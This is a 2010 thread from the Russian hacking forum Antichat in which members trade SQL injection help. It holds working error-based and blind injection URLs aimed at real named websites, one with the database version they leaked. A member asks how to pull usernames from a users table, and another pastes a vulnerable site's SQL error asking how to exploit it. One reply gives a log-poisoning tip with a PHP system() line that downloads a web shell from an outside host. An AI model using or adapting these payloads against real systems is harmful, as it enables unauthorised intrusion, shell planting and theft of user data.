ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.03.2010, 00:04
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от Darren
Никак не могу подобрать колонки, тич литл ступид асс холл плис
http://www.simqam.com/products.php?cid=48%2b1=1
Какбы там блайнд:
http://www.simqam.com/products.php?cid=1+or+(select+count(*)+from+(selec t+1+union+select+2+union+select+3)x+group+by+conca t(version(),floor(rand(0)*2)))--+
Result:
Duplicate entry ' 5.0.67-log1'
|
|
|
21.03.2010, 00:51
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183
Репутация:
13
|
|
Сообщение от Tigger
Какбы там блайнд:
http://www.simqam.com/products.php?cid=1+or+(select+count(*)+from+(selec t+1+union+select+2+union+select+3)x+group+by+conca t(version(),floor(rand(0)*2)))--+
Result:
Duplicate entry '5.0.67-log1'
Sorry за возможно глупый вопрос
В блайндах всегда возможно только выводить по одной строке(значению) или есть такой запрос позволяющий выводить сразу столбом. FAQ я читал и не раз и не два
т.е. например я делаю такой запрос
+UNION+SELECT+*+FROM(SELECT%20*%20FROM%20(SELECT%2 0NAME_CONST((SELECT%20name%20FROM%20users%20LIMIT% 200,1),%2014)d)+as+t+JOIN(SELECT%20NAME_CONST((SEL ECT%20name%20FROM%20users%20LIMIT%200,1),14)e)b)a% 20--
выводит: Duplicate entry: qwerqwer
Выводит только одно значение хоть с лимитом, хоть без него можно ли вывести данные целиком?
|
|
|
|
21.03.2010, 08:49
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Нет, хотя стоп, я же выводил login  assword =\ |
|
|
|
21.03.2010, 09:44
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Мля, начал линки ис топика по скулям проверять ):
Мне интересно стало http://site:3306
Вопрос 1:
Как такое прыкрыть (рационально всмысле)!?
Вопрос 2:
Какие есть вариации каталога по умолчанию для выполнения cgi скриптов(и др. каталоги) у разных веб-серверов с компроментирующими даными ?
сgi-bin/test.pl - например , денвер.
результат - путь.
Админы завтыкуют удалять.
Воше не мешало б создать отдельный топик на этот вопрос и наверно предыдущий.
Хоть и лоловский метод, но уже есть и версия мускула и путь!
Последний раз редактировалось Strilo4ka; 21.03.2010 в 10:03..
|
|
|
|
21.03.2010, 11:59
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
Сообщение от Strilo4ka
Вопрос 1:
Как такое прыкрыть (рационально всмысле)!?
Вопрос 2:
Какие есть вариации каталога по умолчанию для выполнения cgi скриптов(и др. каталоги) у разных веб-серверов с компроментирующими даными ?
сgi-bin/test.pl - например , денвер.
результат - путь.
Ответ 1: фаервол.
Ответ 2: гугл. все не перечесть.
Сообщение от Strilo4ka
но уже есть и версия мускула и путь!
И ничего это не дает само по себе.
|
|
|
|
21.03.2010, 15:58
|
|
Новичок
Регистрация: 06.09.2008
Сообщений: 9
Провел на форуме:
42734
Репутация:
0
|
|
Привет, как произвести инъекцию что бы вытащить хоть какую то инфу т.к не получается (новичок пока) урл палить не буду но вот какая ошибка:
warning: implode() [function.implode]: Bad arguments. in /home/rryan/public_html/alumni/sites/all/modules/views/views.module on line 1961. user warning: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')) AND (.users_roles IN ('rid')) AND (3.node status '=') AND (1.users status '='' at line 1 query: SELECT count( DISTINCT(node.nid)) FROM node node LEFT JOIN node bio ON node.uid = bio.uid AND bio.type = 'uprofile' LEFT JOIN content_type_uprofile bio_node_data_field_year_graduated_or_last_ye ON bio.vid = bio_node_data_field_year_graduated_or_last_ye.vid LEFT JOIN content_type_uprofile bio_node_data_field_name ON bio.vid = bio_node_data_field_name.vid LEFT JOIN users_roles users_roles ON node.uid = users_roles.uid INNER JOIN users users ON node.uid = users.uid LEFT JOIN content_type_uprofile bio_node_data_field_full_name ON bio.vid = bio_node_data_field_full_name.vid INNER JOIN node_access na ON na.nid = node.nid WHERE (na.grant_view >= 1 AND ((na.gid = 0 AND na.realm = 'all') OR (na.gid = 1 AND na.realm = 'workflow_access') OR (na.gid = 0 AND na.realm = 'workflow_access_owner'))) AND ( (bio.status = '1') AND (bio_node_data_field_year_graduated_or_last_ye.fie ld_year_graduated_or_last_ye_value IN ('1')) AND (node.type IN ('uprofile')) AND (()) AND (.users_roles IN ('rid')) AND (3.node status '=') AND (1.users status '=') ) in /home/rryan/public_html/alumni/includes/database.mysql.inc on line 174. user warning: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')) AND (.users_roles IN ('rid')) AND (3.node status '=') AND (1.users status '='' at line 1 query: SELECT DISTINCT(node.nid), bio_node_data_field_year_graduated_or_last_ye.fiel d_year_graduated_or_last_ye_value AS bio_node_data_field_year_graduated_or_last_ye_fiel d_year_graduated_or_last_ye_value, users.uid AS users_uid, bio.title AS bio_title, bio.changed AS bio_changed, bio_node_data_field_full_name.field_full_name_valu e AS bio_node_data_field_full_name_field_full_name_valu e, bio.nid AS bio_nid FROM node node LEFT JOIN node bio ON node.uid = bio.uid AND bio.type = 'uprofile' LEFT JOIN content_type_uprofile bio_node_data_field_year_graduated_or_last_ye ON bio.vid = bio_node_data_field_year_graduated_or_last_ye.vid LEFT JOIN content_type_uprofile bio_node_data_field_name ON bio.vid = bio_node_data_field_name.vid LEFT JOIN users_roles users_roles ON node.uid = users_roles.uid INNER JOIN users users ON node.uid = users.uid LEFT JOIN content_type_uprofile bio_node_data_field_full_name ON bio.vid = bio_node_data_field_full_name.vid INNER JOIN node_access na ON na.nid = node.nid WHERE (na.grant_view >= 1 AND ((na.gid = 0 AND na.realm = 'all') OR (na.gid = 1 AND na.realm = 'workflow_access') OR (na.gid = 0 AND na.realm = 'workflow_access_owner'))) AND ( (bio.status = '1') AND (bio_node_data_field_year_graduated_or_last_ye.fie ld_year_graduated_or_last_ye_value IN ('1')) AND (node.type IN ('uprofile')) AND (()) AND (.users_roles IN ('rid')) AND (3.node status '=') AND (1.users status '=') ) ORDER BY bio_node_data_field_year_graduated_or_last_ye_fiel d_year_graduated_or_last_ye_value ASC LIMIT 0, 26 in /home/rryan/public_html/alumni/includes/database.mysql.inc on line 174.
|
|
|
|
21.03.2010, 16:39
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
есть возможность инклюдить файл с логами. как туда записать свой код ? InetCrack`ом ?
|
|
|
|
21.03.2010, 17:32
|
|
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме:
1187799
Репутация:
62
|
|
Harvard, читай, все идеально расписано http://forum.antichat.ru/thread43966.html
daniel_1024, да ,попробуй замени : "User-Agent", своим шеллом. Для заливки полноценного шелла, отправь такой запрос
PHP код:
<?php system('wget http://site.ru/shell.php'); ?>
Последний раз редактировалось -=Razor=-; 21.03.2010 в 17:56..
|
|
|
|
21.03.2010, 20:05
|
|
Новичок
Регистрация: 06.03.2010
Сообщений: 4
Провел на форуме:
12992
Репутация:
0
|
|
http://www.znania.ru/dbxhigh.asp?id=1'
как узнать версию?
http://www.znania.ru/dbxhigh.asp?id=1+or+1=version@@-- не работает. там фильтрация какая то или что?
|
|
|
|
21.03.2010, 20:08
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от psQs
http://www.znania.ru/dbxhigh.asp?id=1'
как узнать версию?
http://www.znania.ru/dbxhigh.asp?id=1+or+1=version@@-- не работает. там фильтрация какая то или что?
во первых:
http://www.znania.ru/dbxhigh.asp?id=1+or+1=@@version
а во вторых
http://www.znania.ru/dbxhigh.asp?id=1+and+ascii(substring(@@version),1, 1)=53
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
